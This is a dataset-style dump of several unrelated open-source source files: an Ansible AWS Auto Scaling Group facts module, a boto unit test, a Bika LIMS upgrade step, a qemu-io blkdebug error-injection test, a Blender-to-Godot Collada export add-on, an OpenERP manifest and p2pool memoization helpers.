repo_name
stringlengths 5
100
| ref
stringlengths 12
67
| path
stringlengths 4
244
| copies
stringlengths 1
8
| content
stringlengths 0
1.05M
⌀ |
---|---|---|---|---|
crafty78/ansible
|
refs/heads/devel
|
lib/ansible/modules/cloud/amazon/ec2_asg_facts.py
|
9
|
#!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'version': '1.0'}
DOCUMENTATION = '''
---
module: ec2_asg_facts
short_description: Gather facts about ec2 Auto Scaling Groups (ASGs) in AWS
description:
- Gather facts about ec2 Auto Scaling Groups (ASGs) in AWS
version_added: "2.2"
author: "Rob White (@wimnat)"
options:
name:
description:
- The prefix or name of the auto scaling group(s) you are searching for.
- "Note: This is a regular expression match with implicit '^' (beginning of string). Append '$' for a complete name match."
required: false
tags:
description:
- "A dictionary/hash of tags in the format { tag1_name: 'tag1_value', tag2_name: 'tag2_value' } to match against the auto scaling group(s) you are searching for."
required: false
extends_documentation_fragment:
- aws
- ec2
'''
EXAMPLES = '''
# Note: These examples do not set authentication details, see the AWS Guide for details.
# Find all groups
- ec2_asg_facts:
register: asgs
# Find a group with matching name/prefix
- ec2_asg_facts:
name: public-webserver-asg
register: asgs
# Find a group with matching tags
- ec2_asg_facts:
tags:
project: webapp
env: production
register: asgs
# Find a group with matching name/prefix and tags
- ec2_asg_facts:
name: myproject
tags:
env: production
register: asgs
# Fail if no groups are found
- ec2_asg_facts:
name: public-webserver-asg
register: asgs
failed_when: "{{ asgs.results | length == 0 }}"
# Fail if more than 1 group is found
- ec2_asg_facts:
name: public-webserver-asg
register: asgs
failed_when: "{{ asgs.results | length > 1 }}"
'''
RETURN = '''
---
auto_scaling_group_arn:
description: The Amazon Resource Name of the ASG
returned: success
type: string
sample: "arn:aws:autoscaling:us-west-2:1234567890:autoScalingGroup:10787c52-0bcb-427d-82ba-c8e4b008ed2e:autoScalingGroupName/public-webapp-production-1"
auto_scaling_group_name:
description: Name of autoscaling group
returned: success
type: str
sample: "public-webapp-production-1"
availability_zones:
description: List of Availability Zones that are enabled for this ASG.
returned: success
type: list
sample: ["us-west-2a", "us-west-2b", "us-west-2a"]
created_time:
description: The date and time this ASG was created, in ISO 8601 format.
returned: success
type: string
sample: "2015-11-25T00:05:36.309Z"
default_cooldown:
description: The default cooldown time in seconds.
returned: success
type: int
sample: 300
desired_capacity:
description: The number of EC2 instances that should be running in this group.
returned: success
type: int
sample: 3
health_check_period:
description: Length of time in seconds after a new EC2 instance comes into service that Auto Scaling starts checking its health.
returned: success
type: int
sample: 30
health_check_type:
description: The service you want the health status from, one of "EC2" or "ELB".
returned: success
type: str
sample: "ELB"
instances:
description: List of EC2 instances and their status as it relates to the ASG.
returned: success
type: list
sample: [
{
"availability_zone": "us-west-2a",
"health_status": "Healthy",
"instance_id": "i-es22ad25",
"launch_configuration_name": "public-webapp-production-1",
"lifecycle_state": "InService",
"protected_from_scale_in": "false"
}
]
launch_configuration_name:
description: Name of launch configuration associated with the ASG.
returned: success
type: str
sample: "public-webapp-production-1"
load_balancer_names:
description: List of load balancers names attached to the ASG.
returned: success
type: list
sample: ["elb-webapp-prod"]
max_size:
description: Maximum size of group
returned: success
type: int
sample: 3
min_size:
description: Minimum size of group
returned: success
type: int
sample: 1
new_instances_protected_from_scale_in:
description: Whether or not new instances a protected from automatic scaling in.
returned: success
type: boolean
sample: "false"
placement_group:
description: Placement group into which instances are launched, if any.
returned: success
type: str
sample: None
status:
description: The current state of the group when DeleteAutoScalingGroup is in progress.
returned: success
type: str
sample: None
tags:
description: List of tags for the ASG, and whether or not each tag propagates to instances at launch.
returned: success
type: list
sample: [
{
"key": "Name",
"value": "public-webapp-production-1",
"resource_id": "public-webapp-production-1",
"resource_type": "auto-scaling-group",
"propagate_at_launch": "true"
},
{
"key": "env",
"value": "production",
"resource_id": "public-webapp-production-1",
"resource_type": "auto-scaling-group",
"propagate_at_launch": "true"
}
]
termination_policies:
description: A list of termination policies for the group.
returned: success
type: str
sample: ["Default"]
'''
try:
import boto3
from botocore.exceptions import ClientError
HAS_BOTO3 = True
except ImportError:
HAS_BOTO3 = False
def match_asg_tags(tags_to_match, asg):
for key, value in tags_to_match.items():
for tag in asg['Tags']:
if key == tag['Key'] and value == tag['Value']:
break
else: return False
return True
def find_asgs(conn, module, name=None, tags=None):
"""
Args:
conn (boto3.AutoScaling.Client): Valid Boto3 ASG client.
name (str): Optional name of the ASG you are looking for.
tags (dict): Optional dictionary of tags and values to search for.
Basic Usage:
>>> name = 'public-webapp-production'
>>> tags = { 'env': 'production' }
>>> conn = boto3.client('autoscaling', region_name='us-west-2')
>>> results = find_asgs(name, conn)
Returns:
List
[
{
"auto_scaling_group_arn": "arn:aws:autoscaling:us-west-2:275977225706:autoScalingGroup:58abc686-9783-4528-b338-3ad6f1cbbbaf:autoScalingGroupName/public-webapp-production",
"auto_scaling_group_name": "public-webapp-production",
"availability_zones": ["us-west-2c", "us-west-2b", "us-west-2a"],
"created_time": "2016-02-02T23:28:42.481000+00:00",
"default_cooldown": 300,
"desired_capacity": 2,
"enabled_metrics": [],
"health_check_grace_period": 300,
"health_check_type": "ELB",
"instances":
[
{
"availability_zone": "us-west-2c",
"health_status": "Healthy",
"instance_id": "i-047a12cb",
"launch_configuration_name": "public-webapp-production-1",
"lifecycle_state": "InService",
"protected_from_scale_in": false
},
{
"availability_zone": "us-west-2a",
"health_status": "Healthy",
"instance_id": "i-7a29df2c",
"launch_configuration_name": "public-webapp-production-1",
"lifecycle_state": "InService",
"protected_from_scale_in": false
}
],
"launch_configuration_name": "public-webapp-production-1",
"load_balancer_names": ["public-webapp-production-lb"],
"max_size": 4,
"min_size": 2,
"new_instances_protected_from_scale_in": false,
"placement_group": None,
"status": None,
"suspended_processes": [],
"tags":
[
{
"key": "Name",
"propagate_at_launch": true,
"resource_id": "public-webapp-production",
"resource_type": "auto-scaling-group",
"value": "public-webapp-production"
},
{
"key": "env",
"propagate_at_launch": true,
"resource_id": "public-webapp-production",
"resource_type": "auto-scaling-group",
"value": "production"
}
],
"termination_policies":
[
"Default"
],
"vpc_zone_identifier":
[
"subnet-a1b1c1d1",
"subnet-a2b2c2d2",
"subnet-a3b3c3d3"
]
}
]
"""
try:
asgs = conn.describe_auto_scaling_groups()
except ClientError as e:
module.fail_json(msg=e.message, **camel_dict_to_snake_dict(e.response))
matched_asgs = []
if name is not None:
# if the user didn't specify a name
name_prog = re.compile(r'^' + name)
for asg in asgs['AutoScalingGroups']:
if name:
matched_name = name_prog.search(asg['AutoScalingGroupName'])
else:
matched_name = True
if tags:
matched_tags = match_asg_tags(tags, asg)
else:
matched_tags = True
if matched_name and matched_tags:
matched_asgs.append(camel_dict_to_snake_dict(asg))
return matched_asgs
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(
dict(
name=dict(type='str'),
tags=dict(type='dict'),
)
)
module = AnsibleModule(argument_spec=argument_spec)
if not HAS_BOTO3:
module.fail_json(msg='boto3 required for this module')
asg_name = module.params.get('name')
asg_tags = module.params.get('tags')
try:
region, ec2_url, aws_connect_kwargs = get_aws_connection_info(module, boto3=True)
autoscaling = boto3_conn(module, conn_type='client', resource='autoscaling', region=region, endpoint=ec2_url, **aws_connect_kwargs)
except ClientError as e:
module.fail_json(msg=e.message, **camel_dict_to_snake_dict(e.response))
results = find_asgs(autoscaling, module, name=asg_name, tags=asg_tags)
module.exit_json(results=results)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.ec2 import *
if __name__ == '__main__':
main()
|
alfredodeza/boto
|
refs/heads/develop
|
tests/unit/machinelearning/test_machinelearning.py
|
91
|
# Copyright (c) 2015 Amazon.com, Inc. or its affiliates. All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
from boto.compat import json
from boto.machinelearning.layer1 import MachineLearningConnection
from tests.unit import AWSMockServiceTestCase
class TestMachineLearning(AWSMockServiceTestCase):
connection_class = MachineLearningConnection
def test_predict(self):
ml_endpoint = 'mymlmodel.amazonaws.com'
self.set_http_response(status_code=200, body=b'')
self.service_connection.predict(
ml_model_id='foo', record={'Foo': 'bar'},
predict_endpoint=ml_endpoint)
self.assertEqual(self.actual_request.host, ml_endpoint)
def test_predict_with_scheme_in_endpoint(self):
ml_endpoint = 'mymlmodel.amazonaws.com'
self.set_http_response(status_code=200, body=b'')
self.service_connection.predict(
ml_model_id='foo', record={'Foo': 'bar'},
predict_endpoint='https://' + ml_endpoint)
self.assertEqual(self.actual_request.host, ml_endpoint)
|
DeBortoliWines/Bika-LIMS
|
refs/heads/hotfix/next
|
bika/lims/upgrade/to3014.py
|
2
|
from Acquisition import aq_inner
from Acquisition import aq_parent
from bika.lims.permissions import *
def upgrade(tool):
portal = aq_parent(aq_inner(tool))
# missing /supplyorders folder permission
clients = portal.clients.objectValues()
for client in clients:
mp = client.manage_permission
mp(AddSupplyOrder, ['Manager', 'LabManager', 'Owner'], 0)
client.reindexObject()
return True
|
suqinhuang/virt-test
|
refs/heads/master
|
qemu/tests/qemu_io_blkdebug.py
|
1
|
import re, logging, ConfigParser
from autotest.client.shared import error
from virttest import qemu_io
from virttest import utils_misc
from virttest.qemu_storage import QemuImg
from autotest.client import utils
@error.context_aware
def run_qemu_io_blkdebug(test, params, env):
"""
Run qemu-io blkdebug tests:
1. Create image with given parameters
2. Write the blkdebug config file
3. Try to do operate in image with qemu-io and get the error message
4. Get the error message from perror by error number set in config file
5. Compare the error message
@param test: kvm test object
@param params: Dictionary with the test parameters
@param env: Dictionary with test environment.
"""
tmp_dir = params.get("tmp_dir", "/tmp")
blkdebug_cfg = utils_misc.get_path(tmp_dir, params.get("blkdebug_cfg",
"blkdebug.cfg"))
err_command = params["err_command"]
err_event = params["err_event"]
errn_list = re.split("\s+", params["errn_list"].strip())
re_std_msg = params["re_std_msg"]
test_timeout = int(params.get("test_timeout", "60"))
pre_err_commands = params.get("pre_err_commands")
image = params.get("images")
blkdebug_default = params.get("blkdebug_default")
error.context("Create image", logging.info)
image_io = QemuImg(params.object_params(image), test.bindir, image)
image_name = image_io.create(params.object_params(image))
template_name = utils_misc.get_path(test.virtdir, blkdebug_default)
template = ConfigParser.ConfigParser()
template.read(template_name)
for errn in errn_list:
log_filename = utils_misc.get_path(test.outputdir,
"qemu-io-log-%s" % errn)
error.context("Write the blkdebug config file", logging.info)
template.set("inject-error", "event", '"%s"' % err_event)
template.set("inject-error", "errno", '"%s"' % errn)
error.context("Write blkdebug config file", logging.info)
blkdebug = None
try:
blkdebug = open(blkdebug_cfg, 'w')
template.write(blkdebug)
finally:
if blkdebug is not None:
blkdebug.close()
error.context("Operate in qemu-io to trigger the error", logging.info)
session = qemu_io.QemuIOShellSession(test, params, image_name,
blkdebug_cfg=blkdebug_cfg,
log_filename=log_filename)
if pre_err_commands:
for cmd in re.split(",", pre_err_commands.strip()):
session.cmd_output(cmd, timeout=test_timeout)
output = session.cmd_output(err_command, timeout=test_timeout)
error.context("Get error message from command perror", logging.info)
perror_cmd = "perror %s" % errn
std_msg = utils.system_output(perror_cmd)
std_msg = re.findall(re_std_msg, std_msg)
if std_msg:
std_msg = std_msg[0]
else:
std_msg = ""
logging.warning("Can not find error message from perror")
session.close()
error.context("Compare the error message", logging.info)
if std_msg:
if std_msg in output:
logging.info("Error message is correct in qemu-io")
else:
fail_log = "The error message is mismatch:"
fail_log += "qemu-io reports: '%s'," % output
fail_log += "perror reports: '%s'" % std_msg
raise error.TestFail(fail_log)
else:
logging.warning("Can not find error message from perror."
" The output from qemu-io is %s" % output)
|
est31/godot
|
refs/heads/master
|
tools/export/blender25/godot_export_manager.py
|
13
|
# ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
# Script copyright (c) Andreas Esau
bl_info = {
"name": "Godot Export Manager",
"author": "Andreas Esau",
"version": (1, 0),
"blender": (2, 7, 0),
"location": "Scene Properties > Godot Export Manager",
"description": "Godot Export Manager uses the Better Collada Exporter to manage Export Groups and automatically export the objects groups to Collada Files.",
"warning": "",
"wiki_url": ("http://www.godotengine.org"),
"tracker_url": "",
"category": "Import-Export"}
import bpy
from bpy.props import StringProperty, BoolProperty, EnumProperty, FloatProperty, FloatVectorProperty, IntProperty, CollectionProperty, PointerProperty
import os
from bpy.app.handlers import persistent
from mathutils import Vector, Matrix
class godot_export_manager(bpy.types.Panel):
bl_label = "Godot Export Manager"
bl_space_type = 'PROPERTIES'
bl_region_type = 'WINDOW'
bl_context = "scene"
bpy.types.Scene.godot_export_on_save = BoolProperty(default=False)
### draw function for all ui elements
def draw(self, context):
layout = self.layout
split = self.layout.split()
scene = bpy.data.scenes[0]
ob = context.object
scene = context.scene
row = layout.row()
col = row.column()
col.prop(scene,"godot_export_on_save",text="Export Groups on save")
row = layout.row()
col = row.column(align=True)
op = col.operator("scene.godot_add_objects_to_group",text="Add selected objects to Group",icon="COPYDOWN")
op = col.operator("scene.godot_delete_objects_from_group",text="Delete selected objects from Group",icon="PASTEDOWN")
row = layout.row()
col = row.column()
col.label(text="Export Groups:")
row = layout.row()
col = row.column()
col.template_list("UI_List_Godot","dummy",scene, "godot_export_groups", scene, "godot_export_groups_index",rows=1,maxrows=10,type='DEFAULT')
col = row.column(align=True)
col.operator("scene.godot_add_export_group",text="",icon="ZOOMIN")
col.operator("scene.godot_delete_export_group",text="",icon="ZOOMOUT")
col.operator("scene.godot_export_all_groups",text="",icon="EXPORT")
if len(scene.godot_export_groups) > 0:
row = layout.row()
col = row.column()
group = scene.godot_export_groups[scene.godot_export_groups_index]
col.prop(group,"name",text="Group Name")
col.prop(group,"export_name",text="Export Name")
col.prop(group,"export_path",text="Export Filepath")
row = layout.row()
col = row.column()
row = layout.row()
col = row.column()
col.label(text="Export Settings:")
col = col.row(align=True)
col.prop(group,"apply_loc",toggle=True,icon="MAN_TRANS")
col.prop(group,"apply_rot",toggle=True,icon="MAN_ROT")
col.prop(group,"apply_scale",toggle=True,icon="MAN_SCALE")
row = layout.row()
col = row.column()
col.prop(group,"use_include_particle_duplicates")
col.prop(group,"use_mesh_modifiers")
col.prop(group,"use_tangent_arrays")
col.prop(group,"use_triangles")
col.prop(group,"use_copy_images")
col.prop(group,"use_active_layers")
col.prop(group,"use_anim")
col.prop(group,"use_anim_action_all")
col.prop(group,"use_anim_skip_noexp")
col.prop(group,"use_anim_optimize")
col.prop(group,"anim_optimize_precision")
col.prop(group,"use_metadata")
### Custom template_list look
class UI_List_Godot(bpy.types.UIList):
def draw_item(self, context, layout, data, item, icon, active_data, active_propname, index):
ob = data
slot = item
col = layout.row(align=True)
col.label(text=item.name,icon="GROUP")
col.prop(item,"active",text="")
op = col.operator("scene.godot_select_group_objects",text="",emboss=False,icon="RESTRICT_SELECT_OFF")
op.idx = index
op = col.operator("scene.godot_export_group",text="",emboss=False,icon="EXPORT")
op.idx = index
class add_objects_to_group(bpy.types.Operator):
bl_idname = "scene.godot_add_objects_to_group"
bl_label = "Add Objects to Group"
bl_description = "Adds the selected Objects to the active group below."
undo = BoolProperty(default=True)
def execute(self,context):
scene = context.scene
objects_str = ""
if len(scene.godot_export_groups) > 0:
for i,object in enumerate(context.selected_objects):
if object.name not in scene.godot_export_groups[scene.godot_export_groups_index].nodes:
node = scene.godot_export_groups[scene.godot_export_groups_index].nodes.add()
node.name = object.name
if i == 0:
objects_str += object.name
else:
objects_str += ", "+object.name
self.report({'INFO'}, objects_str + " added to group." )
if self.undo:
bpy.ops.ed.undo_push(message="Objects added to group")
else:
self.report({'WARNING'}, "Create a group first." )
return{'FINISHED'}
class del_objects_from_group(bpy.types.Operator):
bl_idname = "scene.godot_delete_objects_from_group"
bl_label = "Delete Objects from Group"
bl_description = "Delets the selected Objects from the active group below."
def execute(self,context):
scene = context.scene
if len(scene.godot_export_groups) > 0:
selected_objects = []
for object in context.selected_objects:
selected_objects.append(object.name)
objects_str = ""
j = 0
for i,node in enumerate(scene.godot_export_groups[scene.godot_export_groups_index].nodes):
if node.name in selected_objects:
scene.godot_export_groups[scene.godot_export_groups_index].nodes.remove(i)
if j == 0:
objects_str += object.name
else:
objects_str += ", "+object.name
j+=1
self.report({'INFO'}, objects_str + " deleted from group." )
bpy.ops.ed.undo_push(message="Objects deleted from group")
else:
self.report({'WARNING'}, "There is no group to delete from." )
return{'FINISHED'}
class select_group_objects(bpy.types.Operator):
bl_idname = "scene.godot_select_group_objects"
bl_label = "Select Group Objects"
bl_description = "Will select all group Objects in the scene."
idx = IntProperty()
def execute(self,context):
scene = context.scene
for object in context.scene.objects:
object.select = False
for node in scene.godot_export_groups[self.idx].nodes:
if node.name in bpy.data.objects:
bpy.data.objects[node.name].select = True
context.scene.objects.active = bpy.data.objects[node.name]
return{'FINISHED'}
class export_groups_autosave(bpy.types.Operator):
bl_idname = "scene.godot_export_groups_autosave"
bl_label = "Export All Groups"
bl_description = "Exports all groups to Collada."
def execute(self,context):
scene = context.scene
if scene.godot_export_on_save:
for i in range(len(scene.godot_export_groups)):
if scene.godot_export_groups[i].active:
bpy.ops.scene.godot_export_group(idx=i)
self.report({'INFO'}, "All Groups exported." )
bpy.ops.ed.undo_push(message="Export all Groups")
return{'FINISHED'}
class export_all_groups(bpy.types.Operator):
bl_idname = "scene.godot_export_all_groups"
bl_label = "Export All Groups"
bl_description = "Exports all groups to Collada."
def execute(self,context):
scene = context.scene
for i in range(0,len(scene.godot_export_groups)):
bpy.ops.scene.godot_export_group(idx=i,export_all=True)
self.report({'INFO'}, "All Groups exported." )
return{'FINISHED'}
class export_group(bpy.types.Operator):
bl_idname = "scene.godot_export_group"
bl_label = "Export Group"
bl_description = "Exports the active group to destination folder as Collada file."
idx = IntProperty(default=0)
export_all = BoolProperty(default=False)
def copy_object_recursive(self,ob,parent,single_user = True):
new_ob = bpy.data.objects[ob.name].copy()
if single_user or ob.type=="ARMATURE":
new_mesh_data = new_ob.data.copy()
new_ob.data = new_mesh_data
bpy.context.scene.objects.link(new_ob)
if ob != parent:
new_ob.parent = parent
else:
new_ob.parent = None
for child in ob.children:
self.copy_object_recursive(child,new_ob,single_user)
new_ob.select = True
return new_ob
def delete_object(self,ob):
if ob != None:
for child in ob.children:
self.delete_object(child)
bpy.context.scene.objects.unlink(ob)
bpy.data.objects.remove(ob)
def convert_group_to_node(self,group):
if group.dupli_group != None:
for object in group.dupli_group.objects:
if object.parent == None:
object = self.copy_object_recursive(object,object,True)
matrix = Matrix(object.matrix_local)
object.matrix_local = Matrix()
object.matrix_local *= group.matrix_local
object.matrix_local *= matrix
self.delete_object(group)
def execute(self,context):
scene = context.scene
group = context.scene.godot_export_groups
if not group[self.idx].active and self.export_all:
return{'FINISHED'}
for i,object in enumerate(group[self.idx].nodes):
if object.name in bpy.data.objects:
pass
else:
group[self.idx].nodes.remove(i)
bpy.ops.ed.undo_push(message="Clear not existent Group Nodes.")
path = group[self.idx].export_path
if (path.find("//")==0 or path.find("\\\\")==0):
#if relative, convert to absolute
path = bpy.path.abspath(path)
path = path.replace("\\","/")
### if path exists and group export name is set the group will be exported
if os.path.exists(path) and group[self.idx].export_name != "":
context.scene.layers = [True,True,True,True,True,True,True,True,True,True,True,True,True,True,True,True,True,True,True,True]
if group[self.idx].export_name.endswith(".dae"):
path = os.path.join(path,group[self.idx].export_name)
else:
path = os.path.join(path,group[self.idx].export_name+".dae")
hide_select = []
for object in context.scene.objects:
hide_select.append(object.hide_select)
object.hide_select = False
object.select = False
context.scene.objects.active = None
### make particle duplicates, parent and select them
nodes_to_be_added = []
if group[self.idx].use_include_particle_duplicates:
for i,object in enumerate(group[self.idx].nodes):
if bpy.data.objects[object.name].type != "EMPTY":
context.scene.objects.active = bpy.data.objects[object.name]
bpy.data.objects[object.name].select = True
bpy.ops.object.duplicates_make_real()
for object in context.selected_objects:
nodes_to_be_added.append(object)
bpy.ops.object.parent_set(type="OBJECT", keep_transform=False)
for object in context.selected_objects:
object.select = False
bpy.data.objects[object.name].select = False
context.scene.objects.active = None
for object in nodes_to_be_added:
object.select = True
### select all other nodes from the group
for i,object in enumerate(group[self.idx].nodes):
if bpy.data.objects[object.name].type == "EMPTY":
self.convert_group_to_node(bpy.data.objects[object.name])
else:
bpy.data.objects[object.name].select = True
bpy.ops.object.transform_apply(location=group[self.idx].apply_loc, rotation=group[self.idx].apply_rot, scale=group[self.idx].apply_scale)
bpy.ops.export_scene.dae(check_existing=True, filepath=path, filter_glob="*.dae", object_types=group[self.idx].object_types, use_export_selected=group[self.idx].use_export_selected, use_mesh_modifiers=group[self.idx].use_mesh_modifiers, use_tangent_arrays=group[self.idx].use_tangent_arrays, use_triangles=group[self.idx].use_triangles, use_copy_images=group[self.idx].use_copy_images, use_active_layers=group[self.idx].use_active_layers, use_anim=group[self.idx].use_anim, use_anim_action_all=group[self.idx].use_anim_action_all, use_anim_skip_noexp=group[self.idx].use_anim_skip_noexp, use_anim_optimize=group[self.idx].use_anim_optimize, anim_optimize_precision=group[self.idx].anim_optimize_precision, use_metadata=group[self.idx].use_metadata)
self.report({'INFO'}, '"'+group[self.idx].name+'"' + " Group exported." )
msg = "Export Group "+group[self.idx].name
bpy.ops.ed.undo_push(message="")
bpy.ops.ed.undo()
bpy.ops.ed.undo_push(message=msg)
else:
self.report({'INFO'}, "Define Export Name and Export Path." )
return{'FINISHED'}
class add_export_group(bpy.types.Operator):
bl_idname = "scene.godot_add_export_group"
bl_label = "Adds a new export Group"
bl_description = "Creates a new Export Group with the selected Objects assigned to it."
def execute(self,context):
scene = context.scene
item = scene.godot_export_groups.add()
item.name = "New Group"
for object in context.selected_objects:
node = item.nodes.add()
node.name = object.name
scene.godot_export_groups_index = len(scene.godot_export_groups)-1
bpy.ops.ed.undo_push(message="Create New Export Group")
return{'FINISHED'}
class del_export_group(bpy.types.Operator):
bl_idname = "scene.godot_delete_export_group"
bl_label = "Delets the selected export Group"
bl_description = "Delets the active Export Group."
def invoke(self, context, event):
wm = context.window_manager
return wm.invoke_confirm(self,event)
def execute(self,context):
scene = context.scene
scene.godot_export_groups.remove(scene.godot_export_groups_index)
if scene.godot_export_groups_index > 0:
scene.godot_export_groups_index -= 1
bpy.ops.ed.undo_push(message="Delete Export Group")
return{'FINISHED'}
class godot_node_list(bpy.types.PropertyGroup):
name = StringProperty()
class godot_export_groups(bpy.types.PropertyGroup):
name = StringProperty(name="Group Name")
export_name = StringProperty(name="scene_name")
nodes = CollectionProperty(type=godot_node_list)
export_path = StringProperty(subtype="DIR_PATH")
active = BoolProperty(default=True,description="Export Group")
object_types = EnumProperty(name="Object Types",options={'ENUM_FLAG'},items=(('EMPTY', "Empty", ""),('CAMERA', "Camera", ""),('LAMP', "Lamp", ""),('ARMATURE', "Armature", ""),('MESH', "Mesh", ""),('CURVE', "Curve", ""),),default={'EMPTY', 'CAMERA', 'LAMP', 'ARMATURE', 'MESH','CURVE'})
apply_scale = BoolProperty(name="Apply Scale",description="Apply Scale before export.",default=False)
apply_rot = BoolProperty(name="Apply Rotation",description="Apply Rotation before export.",default=False)
apply_loc = BoolProperty(name="Apply Location",description="Apply Location before export.",default=False)
use_export_selected = BoolProperty(name="Selected Objects",description="Export only selected objects (and visible in active layers if that applies).",default=True)
use_mesh_modifiers = BoolProperty(name="Apply Modifiers",description="Apply modifiers to mesh objects (on a copy!).",default=True)
use_tangent_arrays = BoolProperty(name="Tangent Arrays",description="Export Tangent and Binormal arrays (for normalmapping).",default=False)
use_triangles = BoolProperty(name="Triangulate",description="Export Triangles instead of Polygons.",default=False)
use_copy_images = BoolProperty(name="Copy Images",description="Copy Images (create images/ subfolder)",default=False)
use_active_layers = BoolProperty(name="Active Layers",description="Export only objects on the active layers.",default=True)
use_anim = BoolProperty(name="Export Animation",description="Export keyframe animation",default=False)
use_anim_action_all = BoolProperty(name="All Actions",description=("Export all actions for the first armature found in separate DAE files"),default=False)
use_anim_skip_noexp = BoolProperty(name="Skip (-noexp) Actions",description="Skip exporting of actions whose name end in (-noexp). Useful to skip control animations.",default=True)
use_anim_optimize = BoolProperty(name="Optimize Keyframes",description="Remove double keyframes",default=True)
anim_optimize_precision = FloatProperty(name="Precision",description=("Tolerence for comparing double keyframes (higher for greater accuracy)"),min=1, max=16,soft_min=1, soft_max=16,default=6.0)
use_metadata = BoolProperty(name="Use Metadata",default=True,options={'HIDDEN'})
use_include_particle_duplicates = BoolProperty(name="Include Particle Duplicates",default=True)
def register():
bpy.utils.register_class(godot_export_manager)
bpy.utils.register_class(godot_node_list)
bpy.utils.register_class(godot_export_groups)
bpy.utils.register_class(add_export_group)
bpy.utils.register_class(del_export_group)
bpy.utils.register_class(export_all_groups)
bpy.utils.register_class(export_groups_autosave)
bpy.utils.register_class(export_group)
bpy.utils.register_class(add_objects_to_group)
bpy.utils.register_class(del_objects_from_group)
bpy.utils.register_class(select_group_objects)
bpy.utils.register_class(UI_List_Godot)
bpy.types.Scene.godot_export_groups = CollectionProperty(type=godot_export_groups)
bpy.types.Scene.godot_export_groups_index = IntProperty(default=0,min=0)
def unregister():
bpy.utils.unregister_class(godot_export_manager)
bpy.utils.unregister_class(godot_node_list)
bpy.utils.unregister_class(godot_export_groups)
bpy.utils.unregister_class(export_groups_autosave)
bpy.utils.unregister_class(add_export_group)
bpy.utils.unregister_class(del_export_group)
bpy.utils.unregister_class(export_all_groups)
bpy.utils.unregister_class(export_group)
bpy.utils.unregister_class(add_objects_to_group)
bpy.utils.unregister_class(del_objects_from_group)
bpy.utils.unregister_class(select_group_objects)
bpy.utils.unregister_class(UI_List_Godot)
@persistent
def auto_export(dummy):
bpy.ops.scene.godot_export_groups_autosave()
bpy.app.handlers.save_post.append(auto_export)
if __name__ == "__main__":
register()
|
savoirfairelinux/OpenUpgrade
|
refs/heads/master
|
addons/web_analytics/__openerp__.py
|
62
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2010-2012 OpenERP s.a. (<http://openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Google Analytics',
'version': '1.0',
'category': 'Tools',
'complexity': "easy",
'description': """
Google Analytics.
=================
Collects web application usage with Google Analytics.
""",
'author': 'OpenERP SA',
'website': 'http://openerp.com',
'depends': ['web'],
'data': [
'views/web_analytics.xml',
],
'installable': True,
'active': False,
}
|
q6654282/p2pool
|
refs/heads/master
|
p2pool/util/memoize.py
|
281
|
import itertools
class LRUDict(object):
def __init__(self, n):
self.n = n
self.inner = {}
self.counter = itertools.count()
def get(self, key, default=None):
if key in self.inner:
x, value = self.inner[key]
self.inner[key] = self.counter.next(), value
return value
return default
def __setitem__(self, key, value):
self.inner[key] = self.counter.next(), value
while len(self.inner) > self.n:
self.inner.pop(min(self.inner, key=lambda k: self.inner[k][0]))
_nothing = object()
def memoize_with_backing(backing, has_inverses=set()):
def a(f):
def b(*args):
res = backing.get((f, args), _nothing)
if res is not _nothing:
return res
res = f(*args)
backing[(f, args)] = res
for inverse in has_inverses:
backing[(inverse, args[:-1] + (res,))] = args[-1]
return res
return b
return a
def memoize(f):
return memoize_with_backing({})(f)
class cdict(dict):
def __init__(self, func):
dict.__init__(self)
self._func = func
def __missing__(self, key):
value = self._func(key)
self[key] = value
return value
def fast_memoize_single_arg(func):
return cdict(func).__getitem__
class cdict2(dict):
def __init__(self, func):
dict.__init__(self)
self._func = func
def __missing__(self, key):
value = self._func(*key)
self[key] = value
return value
